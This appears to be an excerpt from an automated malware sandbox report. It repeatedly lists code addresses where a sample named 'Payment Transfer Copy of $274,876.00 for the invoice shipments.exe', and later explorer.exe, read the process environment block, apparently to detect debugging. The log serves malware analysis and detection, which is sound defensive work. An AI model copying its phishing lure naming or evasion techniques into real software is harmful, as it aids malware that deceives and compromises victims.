Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]	4_2_010B740D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]	4_2_010A1C06
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]	4_2_01066C0A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]	4_2_01066C0A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]	4_2_01066C0A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]	4_2_01066C0A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]	4_2_00FFD5E0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]	4_2_00FFD5E0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101BC2C mov eax, dword ptr fs:[00000030h]	4_2_0101BC2C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101A44B mov eax, dword ptr fs:[00000030h]	4_2_0101A44B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107C450 mov eax, dword ptr fs:[00000030h]	4_2_0107C450
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107C450 mov eax, dword ptr fs:[00000030h]	4_2_0107C450
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100746D mov eax, dword ptr fs:[00000030h]	4_2_0100746D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	4_2_00FE2D8A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	4_2_00FE2D8A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	4_2_00FE2D8A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	4_2_00FE2D8A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	4_2_00FE2D8A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	4_2_00FF3D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEAD30 mov eax, dword ptr fs:[00000030h]	4_2_00FEAD30
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B8CD6 mov eax, dword ptr fs:[00000030h]	4_2_010B8CD6
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A14FB mov eax, dword ptr fs:[00000030h]	4_2_010A14FB
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]	4_2_01066CF0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]	4_2_01066CF0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]	4_2_01066CF0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B070D mov eax, dword ptr fs:[00000030h]	4_2_010B070D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B070D mov eax, dword ptr fs:[00000030h]	4_2_010B070D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101A70E mov eax, dword ptr fs:[00000030h]	4_2_0101A70E
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101A70E mov eax, dword ptr fs:[00000030h]	4_2_0101A70E
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100F716 mov eax, dword ptr fs:[00000030h]	4_2_0100F716
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107FF10 mov eax, dword ptr fs:[00000030h]	4_2_0107FF10
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107FF10 mov eax, dword ptr fs:[00000030h]	4_2_0107FF10
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF76E2 mov eax, dword ptr fs:[00000030h]	4_2_00FF76E2
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101E730 mov eax, dword ptr fs:[00000030h]	4_2_0101E730
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B8F6A mov eax, dword ptr fs:[00000030h]	4_2_010B8F6A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF766D mov eax, dword ptr fs:[00000030h]	4_2_00FF766D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]	4_2_01067794
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]	4_2_01067794
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]	4_2_01067794
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	4_2_00FF7E41
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	4_2_00FF7E41
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	4_2_00FF7E41
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	4_2_00FF7E41
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	4_2_00FF7E41
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	4_2_00FF7E41
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEE620 mov eax, dword ptr fs:[00000030h]	4_2_00FEE620
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010237F5 mov eax, dword ptr fs:[00000030h]	4_2_010237F5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]	4_2_00FEC600
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]	4_2_00FEC600
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]	4_2_00FEC600
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01018E00 mov eax, dword ptr fs:[00000030h]	4_2_01018E00
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1608 mov eax, dword ptr fs:[00000030h]	4_2_010A1608
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101A61C mov eax, dword ptr fs:[00000030h]	4_2_0101A61C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101A61C mov eax, dword ptr fs:[00000030h]	4_2_0101A61C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0109FE3F mov eax, dword ptr fs:[00000030h]	4_2_0109FE3F
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF8794 mov eax, dword ptr fs:[00000030h]	4_2_00FF8794
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]	4_2_0100AE73
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]	4_2_0100AE73
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]	4_2_0100AE73
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]	4_2_0100AE73
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]	4_2_0100AE73
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107FE87 mov eax, dword ptr fs:[00000030h]	4_2_0107FE87
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFFF60 mov eax, dword ptr fs:[00000030h]	4_2_00FFFF60
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010646A7 mov eax, dword ptr fs:[00000030h]	4_2_010646A7
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]	4_2_010B0EA5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]	4_2_010B0EA5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]	4_2_010B0EA5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFEF40 mov eax, dword ptr fs:[00000030h]	4_2_00FFEF40
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01028EC7 mov eax, dword ptr fs:[00000030h]	4_2_01028EC7
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0109FEC0 mov eax, dword ptr fs:[00000030h]	4_2_0109FEC0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010136CC mov eax, dword ptr fs:[00000030h]	4_2_010136CC
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE4F2E mov eax, dword ptr fs:[00000030h]	4_2_00FE4F2E
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE4F2E mov eax, dword ptr fs:[00000030h]	4_2_00FE4F2E
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B8ED6 mov eax, dword ptr fs:[00000030h]	4_2_010B8ED6
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010116E0 mov ecx, dword ptr fs:[00000030h]	4_2_010116E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF8CD6 mov eax, dword ptr fs:[00000030h]	9_2_04CF8CD6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE14FB mov eax, dword ptr fs:[00000030h]	9_2_04CE14FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]	9_2_04CA6CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]	9_2_04CA6CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]	9_2_04CA6CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3849B mov eax, dword ptr fs:[00000030h]	9_2_04C3849B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5A44B mov eax, dword ptr fs:[00000030h]	9_2_04C5A44B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBC450 mov eax, dword ptr fs:[00000030h]	9_2_04CBC450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBC450 mov eax, dword ptr fs:[00000030h]	9_2_04CBC450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4746D mov eax, dword ptr fs:[00000030h]	9_2_04C4746D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]	9_2_04CA6C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]	9_2_04CA6C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]	9_2_04CA6C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]	9_2_04CA6C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]	9_2_04CF740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]	9_2_04CF740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]	9_2_04CF740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]	9_2_04CE1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5BC2C mov eax, dword ptr fs:[00000030h]	9_2_04C5BC2C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04CA6DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04CA6DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04CA6DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6DC9 mov ecx, dword ptr fs:[00000030h]	9_2_04CA6DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04CA6DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04CA6DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3D5E0 mov eax, dword ptr fs:[00000030h]	9_2_04C3D5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3D5E0 mov eax, dword ptr fs:[00000030h]	9_2_04C3D5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]	9_2_04CEFDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]	9_2_04CEFDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]	9_2_04CEFDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]	9_2_04CEFDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CD8DF1 mov eax, dword ptr fs:[00000030h]	9_2_04CD8DF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]	9_2_04C52581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]	9_2_04C52581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]	9_2_04C52581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]	9_2_04C52581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]	9_2_04C22D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]	9_2_04C22D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]	9_2_04C22D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]	9_2_04C22D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]	9_2_04C22D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5FD9B mov eax, dword ptr fs:[00000030h]	9_2_04C5FD9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5FD9B mov eax, dword ptr fs:[00000030h]	9_2_04C5FD9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF05AC mov eax, dword ptr fs:[00000030h]	9_2_04CF05AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF05AC mov eax, dword ptr fs:[00000030h]	9_2_04CF05AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C535A1 mov eax, dword ptr fs:[00000030h]	9_2_04C535A1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]	9_2_04C51DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]	9_2_04C51DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]	9_2_04C51DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C63D43 mov eax, dword ptr fs:[00000030h]	9_2_04C63D43
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA3540 mov eax, dword ptr fs:[00000030h]	9_2_04CA3540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C47D50 mov eax, dword ptr fs:[00000030h]	9_2_04C47D50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4C577 mov eax, dword ptr fs:[00000030h]	9_2_04C4C577
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4C577 mov eax, dword ptr fs:[00000030h]	9_2_04C4C577
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2AD30 mov eax, dword ptr fs:[00000030h]	9_2_04C2AD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]	9_2_04C33D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEE539 mov eax, dword ptr fs:[00000030h]	9_2_04CEE539
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF8D34 mov eax, dword ptr fs:[00000030h]	9_2_04CF8D34
